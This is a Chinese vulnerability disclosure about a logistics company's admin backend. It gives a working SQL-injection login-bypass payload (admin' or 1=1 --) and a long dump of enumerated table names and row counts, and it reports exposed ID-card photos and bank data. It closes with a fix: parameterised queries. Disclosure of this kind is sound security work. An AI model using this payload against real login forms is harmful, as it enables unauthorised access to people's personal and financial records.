飞特物流某系统后台登录绕过/sql注入（千万用户数据/运单/银行卡号/身份证照片）

后台登录绕过/sql注入

http://**.**.**.**/manage/admin.aspx

输入admin'报错

 

 

可以绕过(使用低版本ie比如ie6)

用户名

admin' or 1=1 --

密码随意

 

 

 

 

同时该处还存在sql注入

13库

 

 

 

 

430张表

 

 

数千万数据

 

 

 

 

 

 

web server operating system: Windows 2008 R2 or 7

web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727

back-end DBMS: Microsoft SQL Server 2012

SELECT a.name, b.rows FROM sysobjects AS a INNER JOIN sysindexes AS b ON a.id = b.id WHERE (a.type = 'u') AND (b.indid IN (0, 1)) ORDER BY b.rows DESC [407]:

[*] SmtErrorLog, 59062443

[*] MoneyRecord, 39373205

[*] orderDetail, 59062447

[*] haikwanDetail, 34760162

[*] orderParent, 39373211

[*] haikwanParent, 39373280

[*] orderDetailHistory, 39373340

[*] TotalAllImport, 39373451

[*] ReProductPriceRecord, 39373599

[*] ExpressImport, 39373754

[*] ReOrderDeliveryRecord, 39373865

[*] SenderByOrder, 39374318

[*] PostTracesAreaBySpecialType, 39374460

[*] FlytReceiveVolume, 39374559

[*] goodsDetail, 39374676

[*] ReceiveDetail, 39374790

[*] TrackParentOrders, 39374932

[*] OrderHistory, 59062498

[*] OrderPerformanceUser, 39375129

[*] TB_MailFilterList, 39375249

[*] TransitLableListItem, 39375375

[*] FlytLabelPrintHistory, 59062507

[*] OrderSource, 39375561

[*] OrderToTransactionRate, 39375633

[*] OrderToOSOrder, 59062515

[*] T_TestJJ, 39375753

[*] OrderRemark, 39375829

[*] OrderJJOverweight, 39375903

[*] OrderQuantity, 59062525

[*] FlytReceiveTemp, 39376037

[*] RelatePPLToREPORTS, 39376119

[*] OrderListItemType, 39376161

[*] PickTempRecordDetail, 39376205

[*] ReportEubUpWebTime, 39376269

[*] OrderJJTemp_Bak, 39376324

[*] ModifyPostTypeOrders, 39376401

[*] ContactCustomerProgress, 36143082

[*] QualityInspectionItem, 36143090

[*] BatchTransitLableListItem, 36143094

[*] BillReceive, 34760292

[*] ActivitySource, 34760295

[*] customSet, 30097463

[*] OrderCoupon, 59062554

[*] OrderSplitfactor, 36143104

[*] FreightLog, 36143105

[*] CreateTableID, 59062558

[*] FGMSRecordInfo, 36143109

[*] CreateBarCodeToUser, 30097479

[*] Smt_Lin_OrderID, 59062565

[*] ExpTrack, 31516705

[*] goodsParent, 36143119

[*] customSet_20140730, 34760317

[*] ERPCustomCode, 59062575

[*] OrderUsePoints, 59062578

[*] GoodsTransferDetail, 59062580

[*] ChangeTraceOrder, 36143128

[*] QualityInspection, 36143133

[*] TransitNos, 36143136

[*] CarTransportTimeout, 59062587

[*] TransitLableList, 36143141

[*] ReturnOrderListItem, 59062593

[*] OrderBackFreight, 36143146

[*] UPS_DHL_Remote_Area, 30097493

[*] MoneyDelRecord, 59062601

[*] OrderDeceiveLevel, 34760324

[*] BatchTransitLableList, 28624602

[*] CustomerDebtAlertHistory, 28624607

[*] OrdersPrintNumber, 29749202

[*] Outorder, 28624622

[*] UpWebTimeByTraceID, 59062621

[*] BatchPostyPKGDetail, 59062623

[*] BatchPostyDetail, 34760339

[*] BagListItem, 36143175

[*] TwiceReceiptGoods, 59062631

[*] userInfoHistory, 28624653

[*] PostTracesByType, 34760344

[*] FlytSecondaryReceivingInfo, 34760351

[*] PickTempRecordParent, 34760353

[*] VolumeWeightRecord, 31516769

[*] ProfitMarginReport, 36143200

[*] PostCounter_ProductFeature, 31516774

[*] T_WT_ManageLog, 36143206

[*] OrderMatchHistory, 36143209

[*] OrderAuditLog, 59062651

[*] TransportSingleDetail, 34760364

[*] TrackingForCN, 34760366

[*] TrackOrderInfo, 34760369

[*] OrderAutoSplitLog, 34760367

[*] LosingAccountHistory, 36143224

[*] LosingAccount, 34760386

[*] FlytFees, 31516803

[*] MoneyInitializeRecord, 34760385

[*] XMLFileContent, 59062660

[*] eLogisticsOperateHistory, 36143233

[*] SeaRailTransSitDetail, 34760402

[*] Exchange_rateHistory, 59062664

[*] RecordMatchPostType, 36143238

[*] T_TrackOrdersLog, 7112250

[*] FlytUserMailSend, 59062673

[*] MultipleConditionOfPostType, 30097588

[*] TransportSingle, 34760417

[*] postTypeParent, 36143253

[*] userInfo, 36143258

[*] MoneyRecordTime, 7112344

[*] T_WT_Manage, 36143261

[*] CustomsBasedInformation, 34760429

[*] Lostpkg_History, 7112378

[*] OrderBlack, 39376378

[*] RechargePrintRecord, 7112394

[*] userInfo_bak20140926, 34760435

[*] OrderTrackHistory, 7112421

[*] userInfo_bak20140925, 7112431

[*] OrderJJTemp, 34760440

[*] OrderStatusSync, 59062715

[*] ProcessCenterSet, 7112463

[*] UserInfoTrack, 36143287

[*] CustomsClearanceFee, 36143291

[*] Charge, 36143295

[*] ReturnOrderList, 7112519

[*] NoPostal, 59062733

[*] OrderError, 39376409

[*] BatchProcessing, 39376445

[*] OrderToServiceMailSend, 59062738

[*] OrderRecordByPMC, 39376556

[*] tmp_deal_orderData20150922, 39376592

[*] tmp_deal_orderData20150922, 39376628

[*] ChargeByCountry, 39376667

[*] PkgToHongkongUnDelivered, 39376709

[*] Receive_TraceID, 59062751

[*] BatchPosty, 39376745

[*] Lostpkg_Apply, 39376766

[*] PostTypeOptionSortCode, 39376787

[*] InfringementManage, 59062760

[*] FlytZoneByCountry, 39376847

[*] FlytPostZone, 39376874

[*] ShipmentErrorOrder, 59062767

[*] FlytPostRoundingByWeight, 39376919

[*] PostTypeOperatHistory, 39376946

[*] WMSBatchNo, 39376970

[*] FreightSettingLog, 39377000

[*] T_FreiPostOrderBatchNum, 39377021

[*] conditionOfPostType, 36143325

[*] MoneyResetRecord, 39377075

[*] T_GoodsQuestionLog, 59062786

[*] T_ChinaPostSenderInfo, 39377102

[*] OUBShipmentData, 39377120

[*] HKEms_charge, 39377138

[*] PostLimited_RelatedProductLable, 39377162

[*] PostTypeInProcessCenter, 39377195

[*] TransitLableListRelatived, 39377234

[*] BadAccount, 39377255

[*] Temp_RegUserSendMailList, 39377282

[*] SenderInformation, 39377309

[*] QuestionVerify, 39377333

[*] ResponsibilityEvents, 39377360

[*] ErpAutoCheckOrder, 39377382

[*] SMTAccount, 34760577

[*] CMS_News, 36143374

[*] T_FDS_WS_SyncLog, 7113615

[*] T_WT_History, 7113626

[*] CountryByPostType, 34760597

[*] Customerhistory, 59063095

[*] FeesDiscount, 59063118

[*] T_ReturnOrderScanRemarks, 28625563

[*] FlytPostTypeSpecialCost, 59063161

[*] OrderLogisticsFreight, 59063183

[*] PostAndRegeistCharge, 59063201

[*] Charge_Other, 59063219

[*] PostTypeCountryOption, 59063236

[*] tablespaceinfo, 59063247

[*] T_GoodsQuestionManagement, 34760820

[*] PostType_MailTypeByGroup, 59063278

[*] TrackCarrier, 59063289

[*] Usps_labelArea, 59063303

[*] postType, 7116992

[*] CountrySortingNo, 59063320

[*] ConfirmedTag, 59063328

[*] OperHistory, 59063335

[*] countrys, 59063347

[*] NationalRegionCountry, 59063358

[*] PostTypeOptions, 59063368

[*] DataCountryCode, 59063380

[*] OutboundCountryToZone, 31517189

[*] UserAmazonAccount, 39377366

[*] CountryHKAPVolumeMark, 28625954

[*] ReturnMoneryApply, 36143637

[*] T_FreipostCountrys, 59063439

[*] TrackCountry, 36143644

[*] CountrySgEmsSortingNo, 59063463

[*] PostTypeToTrackCarrier, 39377387

[*] PostTypeToTrackCarrier, 59063491

[*] SeaRailTransSit, 39377528

[*] PremiumPriceInProcessCenter, 59063503

[*] FlytSubmitProcessCenter, 39377692

[*] PayPalAdvance, 39377810

[*] ImpExcel, 59063530

[*] ImpExcel, 59063537

[*] ImpExcel, 59063542

[*] GoodsTransfer, 59063549

[*] Printshippingaddressconfig, 59063557

[*] FgmsPrint, 59063565

[*] FgmsPrint, 39378392

[*] csv58039, 59063579

[*] OrderParentExtend, 59063587

[*] csv57880, 59063595

[*] Cost_Charge, 59063601

[*] PerformanceOfTypeDetail, 39378773

[*] ExpressSetting, 39378881

[*] EAExpense, 59063629

[*] csv57822, 39379103

[*] DownLoadHistory, 59063651

[*] OrderErrorCode, 59063661

[*] csv58460, 59063671

[*] csv18981, 39379421

[*] CustomerRankParameter, 39379502

[*] BankAccount, 59063694

[*] BankAccount, 59063704

[*] FlytSetPostVolume, 59063709

[*] FlytSetPostVolume, 59063721

[*] relationOfUserGroup, 39379862

[*] ImTrace, 59063740

[*] HuijiangCNAMGZSenderInfo, 59063747

[*] GroupRelateSeller, 59063760

[*] GroupRelateSeller, 39380213

[*] deliverAddress, 39380292

[*] DeliverBank, 59063791

[*] DeliverBank, 39380460

[*] EADepartment, 59063802

[*] ReturnImport, 36143763

[*] TraceIdQueryCondition, 31517326

[*] EfficiencyReport, 36143769

[*] DGMESCharge, 34760995

[*] usermenu, 28626138

[*] csv70327, 59063859

[*] csv70327, 31517348

[*] Exchange_rate, 36143794

[*] Exchange_rate, 59063880

[*] HKDHLPartTable, 59063892

[*] CustomerParameter, 59063905

[*] ApiSignPlatform, 59063915

[*] ApiSignPlatform, 28626174

[*] ChinaPostPartTable, 59063935

[*] ChinaPostPartTable, 30098161

[*] ChinaPostPartTable, 59063954

[*] ChinaPostPartTableSH, 59063962

[*] csv58365, 34761055

[*] PostTypeInProcessLog, 36143875

[*] DeliverAddressToProcessCenter, 59063987

[*] EAReimburseHistory, 59064001

[*] ChannelNumberMapPostType, 59064007

[*] CrossPostProblemOrder, 59064014

[*] CrossPostProblemOrder, 59064023

[*] CrossPostProblemOrder, 59064034

[*] CrossPostProblemOrder, 59064044

[*] EAReimburseAudit, 59064052

[*] EAReimburseDetail, 59064058

[*] BlackListPay, 36143908

[*] BlackListPay, 59064076

[*] csv19626, 59064086

[*] csv19626, 36143933

[*] MoneyAudit, 36143942

[*] SystemConfig, 34761113

[*] csv20453, 59064135

[*] csv20453, 59064144

[*] EAReimburse, 59064154

[*] EAReimburse, 59064167

[*] GlobalExpressRecord, 59064179

[*] GlobalExpressRecord, 59064191

[*] DHLPartTable, 36143997

[*] GZEMSPartTable, 36144004

[*] MailTypeByGroup, 36144009

[*] PostTypeToStorage, 59064223

[*] OutboundTraceIdFormat, 36144033

[*] OutboundTraceIdFormat, 36144036

[*] PostTypeByGroup, 59064239

[*] ChannelScanHistory, 59064250

[*] ChannelScanHistory, 36144051

[*] EABankAccount, 59064266

[*] ChannelScanListItem, 36144060

[*] ChannelScanListItem, 59064285

[*] ChannelScanListItem, 28626297

[*] ChannelScanListItem, 34761233

[*] ChannelScanListItem, 59064308

[*] NationalRegion, 59064319

[*] csv20531, 59064325

[*] csv21877, 59064330

[*] csv70402, 36144088

[*] csv70402, 59064352

[*] customerRank, 59064362

[*] CustomServiceRecord, 36144108

[*] images, 36144115

[*] images, 36144120

[*] images, 59064388

[*] ChannelScanList, 59064397

[*] EubApiRequester, 59064408

[*] EubApiRequester, 36144133

[*] EubApiRequester, 59064422

[*] EubApiRequester, 59064429

[*] EubApiRequester, 59064440

[*] PerformanceOfType, 59064444

[*] CMS_tbLink, 59064448

[*] CMS_tbLink, 59064455

[*] CMS_tbLink, 59064461

[*] CMS_tbLink, 36144185

[*] CMS_tbLink, 36144190

[*] CMS_tbLink, 59064485

[*] csv17186, 36144202

[*] T_InformationCollectionLibrary, 59064494

[*] ChannelChargeSetting, 59064504

[*] ChannelChargeSetting, 36144220

[*] ChannelChargeSetting, 59064513

[*] ChannelChargeSetting, 36144235

[*] ChannelChargeSetting, 59064525

[*] ChannelChargeSetting, 36144241

[*] csv21199, 59064536

[*] csv21199, 59064544

[*] csv21199, 59064553

[*] csv21199, 34761367

[*] csv70018, 59064572

[*] csv70018, 36144279

[*] csv70221, 59064590

[*] csv70221, 59064601

[*] SetFlytUserToPostTypeWhiteList, 59064611

[*] BlacklistUsers, 59064617

[*] BlacklistUsers, 36144308

[*] BlacklistUsers, 59064632

[*] BlacklistUsers, 59064638

[*] BlacklistUsers, 36144320

[*] BlacklistUsers, 36144334

[*] BlacklistUsers, 7122255

[*] BlacklistUsers, 59064694

[*] BlacklistUsers, 36144346

[*] BlacklistUsers, 39380511

[*] BlacklistUsers, 39380547

[*] BlacklistUsers, 39380595

[*] BlacklistUsers, 59064735

[*] BlacklistUsers, 59064745

[*] BlacklistUsers, 39380819

[*] BlacklistUsers, 39380880

[*] BlacklistUsers, 59064776

[*] BlacklistUsers, 59064785

[*] BlacklistUsers, 39381030

[*] BlacklistUsers, 39381068

[*] BlacklistUsers, 59064803

[*] BlacklistUsers, 39381156

[*] BlacklistUsers, 59064821

[*] BlacklistUsers, 59064833

[*] BlacklistUsers, 39381243

[*] BlacklistUsers, 39381276

[*] BlacklistUsers, 59064858

[*] BlacklistUsers, 39381325

[*] BlacklistUsers, 36144499

[*] BlacklistUsers, 59064881

[*] CMS_NewMenu, 39381393

[*] CMS_NewMenu, 59064898

[*] CMS_NewMenu, 36144531

[*] CMS_NewMenu, 39381462

[*] CMS_NewMenu, 39381480

[*] CMS_NewMenu, 59064923

[*] CMS_NewMenu, 39381519

[*] CMS_NewMenu, 39381549

[*] CMS_NewMenu, 39381575

[*] CMS_NewMenu, 39381600

[*] CMS_NewMenu, 59064950

[*] CMS_NewMenu, 39381636

[*] CMS_NewMenu, 59064965

[*] CMS_NewMenu, 7123442

[*] CMS_NewMenu, 31517982

[*] CMS_NewMenu, 59064988

[*] CMS_NewMenu, 36144597

[*] CMS_NewMenu, 59065002

[*] CMS_NewMenu, 59065008

[*] CMS_NewMenu, 34761585

[*] CMS_NewMenu, 31517996

[*] CMS_NewMenu, 36144639

[*] CMS_NewMenu, 36144666

[*] CMS_NewMenu, 59065109

[*] CMS_NewMenu, 59065112

[*] CMS_NewMenu, 31518049

[*] CMS_NewMenu, 59065124

[*] CMS_NewMenu, 36144688

[*] CMS_NewMenu, 59065143

[*] CMS_NewMenu, 59065152

[*] CMS_NewMenu, 59065159

[*] CMS_NewMenu, 36144702

[*] csv10370, 34761622

[*] csv10370, 36144707

[*] csv10370, 34761626

[*] csv10370, 59065196

[*] csv10370, 59065203

[*] csv10370, 59065212

[*] csv10370, 59065218

[*] csv10370, 34761637

[*] csv10370, 59065234

[*] csv10370, 59065242

[*] csv10370, 7123780

[*] csv10422, 59065258

[*] csv13030, 36144746

[*] csv13030, 36144753

[*] csv13030, 36144762

[*] csv13030, 59065292

[*] csv13030, 36144785

[*] csv13030, 36144794

[*] csv13030, 59065315

[*] csv13030, 59065321

 

 

 

 

 

 

大量身份证图片

 

 

记录里面的有个字段是用来存放用户的身份证照片

 

 

 

 

UserAmazonAccount

 

 

解决方案：

参数化查询，登录页面的登录逻辑得改